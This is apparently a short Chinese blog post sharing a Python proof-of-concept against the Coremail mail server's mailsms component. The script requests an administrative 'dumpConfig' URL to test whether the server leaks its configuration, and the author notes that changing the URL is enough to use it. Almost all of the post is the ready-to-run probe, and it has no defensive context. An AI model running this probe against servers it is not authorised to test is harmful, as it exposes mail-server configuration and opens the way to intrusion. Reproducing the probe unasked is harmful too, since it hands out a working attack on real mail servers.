coremail poc

作者: print("") 分类: 未分类 发布时间: 2019-06-15 21:01

import requests,sys

def mailsmsPoC(url):
    url = url + "/mailsms/s?func=ADMIN:appState&dumpConfig=/"
    r = requests.get(url)
    if (r.status_code != '404') and ("/home/coremail" in r.text):
        print "mailsms is vulnerable: {0}".format(url)
    else:
        print "mailsms is safe!"

if __name__ == '__main__':
    try:
        mailsmsPoC(sys.argv[1])
    except:
        print "usage: python poc.py http://hi-ourlife.com/"

修改url 即可用

如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!

发表评论

您的电子邮箱地址不会被公开。